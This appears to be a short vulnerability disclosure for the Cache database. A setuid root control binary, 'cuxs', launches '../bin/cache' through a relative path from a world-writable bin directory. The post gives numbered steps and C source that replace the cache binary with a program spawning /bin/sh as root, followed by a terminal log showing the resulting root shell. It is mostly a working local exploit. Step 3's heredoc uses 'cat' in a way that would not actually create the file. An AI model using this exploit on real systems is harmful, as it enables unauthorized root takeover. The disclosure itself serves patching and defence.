A user who is a member of the group configured at installation to start
and stop the cache database can get local root access by exploting poor
file permissions and the use of relative path names in setuid binaries.

Using the following method.

1. mv /path/to/cache/bin/cache /path/to/cache/bin/cache.orig
2. cd /path/to/cache/bin
3. cat cache.c << -EOF-
#include <stdio.h>

int main(void) {
setuid(0);setgid(0);
system("/bin/sh");
}
-EOF-
4. gcc cache.c -o cache
5. ./cuxs

Details:

cuxs is setuid root and can be configured as executeable by a specific 
group upon installation of Cache' database.

cuxs is a control program for Cache, it executes Cache using the following 
system call:
execve("../bin/cache",["cache"],...
since by default bin is world write able the binary cache can be moved and 
replaced by a malicous one.

[lwc@boureguard lwc]$ cd /usr/ecache
[lwc@boureguard ecache]$ ls -ld bin;cd bin
drwxrwxrwx    2 root     root         4096 Mar 18 07:13 bin
[lwc@boureguard bin]$ mv cache cache.orig
[lwc@boureguard bin]$ gcc cache.c -o cache
[lwc@boureguard bin]$ id
uid=500(lwc) gid=500(lwc) groups=500(lwc),10(wheel)
[lwc@boureguard bin]$ ls -l cuxs
-rwsr-x---    1 root     wheel       16488 Mar 18 06:49 cuxs
[lwc@boureguard bin]$ ./cuxs
sh-2.05a# id
uid=0(root) gid=0(root) groups=500(lwc),10(wheel)
sh-2.05a#